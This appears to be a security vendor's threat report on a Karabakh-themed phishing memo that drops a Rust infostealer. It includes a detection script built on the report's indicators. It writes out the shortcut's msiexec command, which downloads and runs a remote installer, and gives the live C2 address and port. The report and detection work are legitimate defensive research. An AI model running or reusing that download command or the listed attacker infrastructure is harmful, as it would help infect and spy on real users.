In 1923, the Soviet Union created the Nagorno-Karabakh Autonomous Oblast (an oblast is an administrative region or province) within the Azerbaijan Soviet Socialist Republic. This oblast has a 95% ethnically Armenian population. In 1988, Nagorno-Karabakh declared its intention to leave Azerbaijan and join the neighboring Republic of Armenia. While the Soviet Union was able to keep the resulting tension under control, once the USSR began to collapse, armed conflict between Azerbaijan and Armenia began for control of the Nagorno-Karabakh region. While a ceasefire was tentatively reached in 1994 and again in 2020, tensions remain high between the two countries.
Figure 1. Regional Map
Affected platforms: Microsoft Windows
Impacted parties: Targeted management associated with an Azerbaijani company
Impact: Reconnaissance of basic computer info of targeted users
Severity level: Low
In August 2023, FortiGuard Labs discovered an infected memo pretending to come from the current president of a company in Azerbaijan and aimed at the management teams of associated businesses. Opening this memo downloads malware designed to gather basic information from its targets.
Figure 2. Memo
This blog analyzes the attack chain, reviews the malware’s capabilities, and reveals the possible location of the threat actor behind it.
FortiGuard Labs spotted this attack by finding the memo in Figure 2. The memo claims to have information about a border clash between soldiers from Azerbaijan and Armenia.
Figure 3. Attack flow
The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive. This archive, as the memo suggests, contains several images. As shown in the attack diagram in Figure 3, the archive contains three clean images and one phony image. The actual contents are illustrated below.
Figure 4. Contents of the zip archive with parts obfuscated for PII purposes
An astute observer may notice that the first "image" is not an image file. In reality, it is a .LNK shortcut that executes the following command:
..\..\Windows\System32\msiexec.exe /i "https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"
This command downloads an .MSI (Microsoft Installer) file. Figure 3 shows this MS installer file performing two actions when clicked. The first action is to display an image with the same filename as the phony image shortcut (shown in the zip archive in Figure 4):
Figure 5. The phony image shown when the .LNK shortcut is executed
This technique may fool some users into thinking the shortcut was simply an image file. But this is misdirection. Instead, the installer simultaneously loads hidden malware into the targeted computer.
The malicious installer creates a new folder in the user’s %APPDATA% folder called “Windows Defender Health Check.” It also installs malware with the same name:
C:\Users\[username]\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe
This malware is programmed in Rust, which is not the programming language of choice for most malware authors. This makes standard analysis tools and methods somewhat less useful. The use of Rust alone sets this threat actor apart. However, it is not the only trait that makes this malware distinct.
For persistence, a temporary file is created called “24rp.xml.” This file is used to create a scheduled task.
Figure 6. Scheduled task
Once the scheduled task is created, the .XML file is deleted. This technique assumes that the intended targets leave their computers on overnight so the malware can execute outside regular office hours when it is less likely to be noticed. Moreover, for even greater stealth, the malware can sleep for random amounts of time when performing its tasks.
Figure 7. Sleep between 10 and 20 minutes
Next, we will refer back to Figure 2 for another indication of how this malware attempts to stay hidden. Notice the memo is dated August 8th. By examining its compile timestamp, we found that this malware was created the previous day.
Figure 8. Creation time of the malware
This short window makes it virtually impossible for the malware to have been released accidentally before the attack started.
Ultimately, the malware acts like an infostealer, gathering basic computer information and sending it to a C2 server. The following commands are executed:
Figure 9. Commands executed by the malware
These commands suggest that the threat actor is still in the early stages of attempting to fully compromise its targets. The information being gathered from these commands could be used to tailor specific attacks for each infected target.
This infostealer is unique because it also collects a list of environment variables and takes an extra step to check for any proxy servers in use.
Figure 10. Checking for proxy
If a proxy server is configured, the malware routes its traffic through it. The malware issues a POST request to send the encrypted information it stole to a C2 server owned by the threat actor, 78[.]135.73.140, through port 35667.
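The chain described above (a .LNK invoking msiexec against a remote URL, a binary dropped under an AppData "Windows Defender Health Check" folder, a scheduled task that runs it after hours, and a POST to 78.135.73.140:35667) can be turned into telemetry checks. The following is an added example, not code from the report or from FortiGuard: a small Python checker run over constructed key=value telemetry lines. The log format, the 08:00-17:59 office-hours window and the sample lines are assumptions.

```python
import re
from urllib.parse import urlparse

# Values stated in the report: the C2 server's /24 and the port of the POST.
C2_NET_PREFIX = "78.135.73."
C2_PORT = "35667"
# Drop folder under %APPDATA%; genuine Defender binaries never live there.
LOOKALIKE_DIR = r"\appdata\roaming\windows defender health check"
OFFICE_HOURS = range(8, 18)  # assumption: 08:00-17:59 is normal working time

# msiexec /i with an http(s) package URL, as in the .LNK's command line.
REMOTE_MSI = re.compile(r'msiexec(?:\.exe)?"?\s+(?:.*\s)?/i\s+"?(https?://[^"\s]+)', re.I)

def parse_line(line: str) -> dict:
    """Parse one constructed 'key=value|key=value' telemetry line."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def check_event(ev: dict) -> list:
    """Return the names of the indicators that fire for one event."""
    hits = []
    m = REMOTE_MSI.search(ev.get("cmdline", ""))
    if m:  # remote MSI install; report the host so analysts can triage it
        hits.append("msiexec_remote_msi:" + (urlparse(m.group(1)).hostname or "?"))
    if LOOKALIKE_DIR in ev.get("image", "").lower():
        hits.append("defender_lookalike_path")
    if ev.get("type") == "task":
        if LOOKALIKE_DIR in ev.get("action", "").lower():
            hits.append("task_runs_lookalike_binary")
        if int(ev.get("start", "12:00").split(":")[0]) not in OFFICE_HOURS:
            hits.append("task_after_hours")
    if ev.get("type") == "net":
        if ev.get("dst", "").startswith(C2_NET_PREFIX):
            hits.append("known_c2_subnet")
        if ev.get("dport") == C2_PORT:
            hits.append("c2_port")
    return hits

def scan(lines: list) -> dict:
    """Map each line index to its hits; lines with no hits are omitted."""
    hits_by_line = {i: check_event(parse_line(l)) for i, l in enumerate(lines)}
    return {i: h for i, h in hits_by_line.items() if h}

# Constructed sample telemetry shaped like the chain in the report (not real logs).
SAMPLE = [
    r'type=proc|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec.exe /i "https://dl.dropboxusercontent.com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0"',
    r'type=proc|image=C:\Users\alice\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe|cmdline=WindowsDefenderHealthcheck.exe',
    r'type=task|action=C:\Users\alice\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe|start=02:30',
    r'type=net|image=C:\Users\alice\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe|dst=78.135.73.140|dport=35667',
    r'type=proc|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec.exe /i C:\Installers\tool.msi /qn',
]
```

Calling `scan(SAMPLE)` flags the first four lines and leaves the local, benign MSI install untouched.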
Our telemetry found nothing too interesting about the C2 server itself. However, digging into the server uncovered additional information. Based on PDNS and other records, the C2 server 78[.]135.73.140 does not appear to be a shared server. This suggests the threat actor set up and fully controls the server. With this assumption, we searched for more of the threat actor’s network infrastructure. Inside the /24 subnet alone, four additional servers were revealed:
Figure 11. Partial network infrastructure
Using the August 8th date on the memo as a starting point, we searched traffic going to these servers in the month prior. While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July, on a port commonly used for VPN, for a substantial amount of time. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job. The Colombian IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot. If so, this may be the location of the attacker.
The threat actor in this campaign uses a few advanced techniques, including Rust and after-hours execution, to help it stay under the radar and make analysis more difficult. The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources. And the use of a geopolitical lure indicates that this threat actor is plugged in and knows how to target specific users.
Fortinet customers are already protected from these malware samples through AntiVirus and FortiEDR services, as follows:
FortiGuard Labs detects the relevant samples with the following AV signatures:
The URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Fortinet EPP customers running current AntiVirus updates are also protected.
If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.